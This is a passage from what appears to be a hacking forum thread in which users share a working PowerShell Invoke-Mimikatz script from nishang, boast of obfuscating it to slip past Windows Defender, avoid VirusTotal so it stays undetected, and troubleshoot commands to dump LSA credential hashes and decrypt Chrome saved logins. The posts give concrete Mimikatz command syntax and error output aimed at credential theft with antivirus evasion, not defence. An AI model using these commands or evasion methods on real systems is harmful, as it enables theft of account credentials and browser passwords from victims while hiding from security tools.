latenightdrive Posted November 9, 2021 Share Posted November 9, 2021 On 9/4/2020 at 5:49 PM, kuyaya said: Hey all For anyone still searching for a solution, I found one! I've been searching for a working solution just to dump the logon hashes with powershell. Haven't found a working one, but instead found a working invoke-mimikatz! The one from PowerSploit and Empire doesn't work, but the one from nishang does. Link: https://github.com/samratashok/nishang/blob/master/Gather/Invoke-Mimikatz.ps1 Time to obfuscate it... Update (09.09, 23:41 CEST): Successfully obfuscated! I tested it on the latest win10 (version 1903 build 18362.1016). AV was Windows Defender, so it also shouldn't get detected by other AV's. I'm obviously not gonna upload it to virustotal, I don't want that script to be detectable 1 week later... GL to all who also try it, it's totally possible. OMG, THANK YOU After hours of searching for a solution, that one worked! You rock 👍 Link to comment Share on other sites More sharing options...
kuyaya Posted November 12, 2021 Share Posted November 12, 2021 On 12/29/2020 at 7:13 PM, eeeeeesy said: I also tried nishangs mimikatz with the command Invoke-Mimikatz -Command dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect But I get this error about /unprotect so its not decrypting the login data from chrome. Invoke-Mimikatz : A positional parameter cannot be found that accepts argument '/unprotect'. At C:\Users\user4\Desktop\newest working mimikats by nishang\Invoke-Mimikatz.ps1:2754 char:1 + Invoke-Mimikatz -Command dpapi::chrome /in:"%localappdata%\Google\Chr ... Could you tell me what I'm doing wrong? Yes, you're using the commands wrong. If you want to execute an Invoke-Mimikatz command with spaces, you have to enclose it like that: Invoke-Mimikatz -Command '"lsadump::lsa /patch"' However, this doesn't work for commands which require quotes in the command, like the dpapi::chrome does. I'll search for something which works. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.